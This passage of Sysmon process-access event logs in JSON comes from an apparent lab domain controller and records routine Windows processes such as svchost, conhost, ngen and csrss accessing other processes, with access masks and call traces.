{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7421,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7422,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7423,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7424,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7425,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7426,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.726\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-0010F5810D00}\r\nTargetProcessId: 2560\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.726","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-0010F5810D00}","TargetProcessId":"2560","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7427,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.882\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001021840D00}\r\nTargetProcessId: 4484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.882","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001021840D00}","TargetProcessId":"4484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7428,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.882\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001021840D00}\r\nTargetProcessId: 4484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.882","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001021840D00}","TargetProcessId":"4484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7429,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.898\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001021840D00}\r\nTargetProcessId: 4484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 